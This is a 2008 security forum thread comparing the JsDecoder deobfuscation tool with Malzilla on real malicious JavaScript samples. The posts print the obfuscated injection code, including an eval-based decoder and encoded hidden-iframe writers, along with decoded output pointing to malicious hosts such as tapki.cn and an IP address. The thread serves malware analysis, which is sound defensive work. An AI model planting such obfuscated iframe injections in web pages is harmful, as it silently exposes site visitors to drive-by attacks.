Author Topic: JsDecoder  (Read 3489 times)

0 Members and 1 Guest are viewing this topic.

May 09, 2008, 09:21:54 pm
Read 3489 times

sowhat-x

  • Guest
Here's the 'demo' to play around with...
http://code.gosu.pl/dl/JsDecoder/demo/JsDecoder.html

And here are the sources as well,licenced under GPL...  :)
http://code.gosu.pl/dl/JsDecoder/JsDecoder-1.1.0.zip

May 11, 2008, 11:24:29 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I set this loose on the scripts from;

http://www.malwaredomainlist.com/forums/index.php?topic=1749.0

... and alas, it could only handle the basic decoding ..... I gave it;

Code: [Select]
function cgocban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,28,46,15,47,32,60,8,48,16,0,0,0,0,0,0,59,9,5,23,30,19,55,21,53,50,25,3,1,13,62,49,29,39,0,54,11,40,41,24,34,4,58,0,0,0,0,22,0,18,17,7,6,57,20,12,45,10,2,52,51,27,35,42,56,26,38,14,43,61,33,44,37,31,36);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(195^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}cgocban('koqtQIihhK@hXDth8Z3ecIqtrasNQIiUSZoVhDm@kdtoFqZZz04oxdtU2qZphiotrZ4u@TqUnKmw5ZyptD@hlr3@wK0owj@h8S2oh_itwyT@6EsZsiZhtSDwwqmtQ22nXD@ohctUhDit222ZVc06IE0NonseS44UvasZzcNpkoZVF2o0IE46n4oVoaZoFZ46I40p8Dt24qo0vyoo8s@tXomNhIqtrdD00l2oxdtU2qq0zts')
function v4826fd0dd3c0e(v4826fd0dd65c2){ function v4826fd0dd8b4b () {return 16;} return(parseInt(v4826fd0dd65c2,v4826fd0dd8b4b()));}function v4826fd0dd99b1(v4826fd0dd9d9f){  var v4826fd0dda1b5='';for(v4826fd0dda590=0; v4826fd0dda590<v4826fd0dd9d9f.length; v4826fd0dda590+=2){ v4826fd0dda1b5+=(String.fromCharCode(v4826fd0dd3c0e(v4826fd0dd9d9f.substr(v4826fd0dda590, 2))));}return v4826fd0dda1b5;} document.write(v4826fd0dd99b1('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D303039643831313232207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3639343236292B27633433316562655C272077696474683D343036206865696768743D313731207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%61%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%34%38%32%35%31%37%39%30%27%20%77%69%64%74%68%3d%33%31%37%20%68%65%69%67%68%74%3d%34%37%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%33%66%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%35%39%37%31%34%38%33%32%27%20%77%69%64%74%68%3d%33%35%32%20%68%65%69%67%68%74%3d%35%35%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%64%61%32%38%66%33%62%32%65%38%62%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%38%32%38%38%29%2b%27%35%31%32%27%20%77%69%64%74%68%3d%35%36%32%20%68%65%69%67%68%74%3d%34%32%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );

.... and it returned;

Code: [Select]
function cgocban(x)
{
    var l = x.length, b = 1024, i, j, r, p = 0, s = 0, w = 0, t = Array(63, 28, 46, 15, 47, 32, 60, 8,
    48, 16, 0, 0, 0, 0, 0, 0, 59, 9, 5, 23, 30, 19, 55, 21, 53, 50, 25, 3, 1, 13, 62, 49, 29, 39, 0, 54,
    11, 40, 41, 24, 34, 4, 58, 0, 0, 0, 0, 22, 0, 18, 17, 7, 6, 57, 20, 12, 45, 10, 2, 52, 51, 27, 35,
    42, 56, 26, 38, 14, 43, 61, 33, 44, 37, 31, 36);
    for (j = Math.ceil(l / b); j > 0; j--)
    {
        r = '';
        for (i = Math.min(l, b); i > 0; i--, l--)
        {
            {
                w |= (t[x.charCodeAt(p++) - 48]) << s;
                if (s) {
                    r += String.fromCharCode(195^w & 255);
                    w >>= 8;
                    s -= 2
                }
                else {
                    s = 6;
                }
            }
        }
        eval(r);
    }
}
cgocban('koqtQIihhK@hXDth8Z3ecIqtrasNQIiUSZoVhDm@kdtoFqZZz04oxdtU2qZphiotrZ4u@TqUnKmw5ZyptD@hlr3@wK0owj@h8S2oh_itwyT@6EsZsiZhtSDwwqmtQ22nXD@ohctUhDit222ZVc06IE0NonseS44UvasZzcNpkoZVF2o0IE46n4oVoaZoFZ46I40p8Dt24qo0vyoo8s@tXomNhIqtrdD00l2oxdtU2qq0zts') function v4826fd0dd3c0e(v4826fd0dd65c2)
{
    function v4826fd0dd8b4b ()
    {
        return 16;
    }
    return (parseInt(v4826fd0dd65c2, v4826fd0dd8b4b()));
}
function v4826fd0dd99b1(v4826fd0dd9d9f)
{
    var v4826fd0dda1b5 = '';
    for (v4826fd0dda590 = 0; v4826fd0dda590 < v4826fd0dd9d9f.length; v4826fd0dda590 += 2)
    {
        v4826fd0dda1b5 += (String.fromCharCode(v4826fd0dd3c0e(v4826fd0dd9d9f.substr(v4826fd0dda590, 2))));
    }
    return v4826fd0dda1b5;
}
document.write(v4826fd0dd99b1('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D303039643831313232207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3639343236292B27633433316562655C272077696474683D343036206865696768743D313731207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%61%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%34%38%32%35%31%37%39%30%27%20%77%69%64%74%68%3d%33%31%37%20%68%65%69%67%68%74%3d%34%37%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%33%66%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%35%39%37%31%34%38%33%32%27%20%77%69%64%74%68%3d%33%35%32%20%68%65%69%67%68%74%3d%35%35%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%64%61%32%38%66%33%62%32%65%38%62%35%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%38%32%38%38%29%2b%27%35%31%32%27%20%77%69%64%74%68%3d%35%36%32%20%68%65%69%67%68%74%3d%34%32%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );

:(

Malzilla however, returns;

Code: [Select]
window.status='Done';document.write('<iframe name=58ab src="http://3hosts.info/t/?'+Math.round(Math.random()*20178)+'58ab'+'" width=171 height=118 style="display:none"></iframe>')<SCRIPT>window.status='Done';document.write('<iframe name=009d81122 src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*69426)+'c431ebe\' width=406 height=171 style=\'display: none\'></iframe>')</SCRIPT>
<IFRAME name=a5 src='http://tapki.cn/1.html?48251790' width=317 height=476 style='display: none'></IFRAME>
<IFRAME name=3f src='http://tapki.cn/1.html?59714832' width=352 height=556 style='display: none'></IFRAME>
<IFRAME name=da28f3b2e8b5 src='http://tapki.cn/1.html?'+Math.round(Math.random()*238288)+'512' width=562 height=424 style='display: none'></IFRAME>

So definately not as good as Malzilla, but could be useful if it's improved ........
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net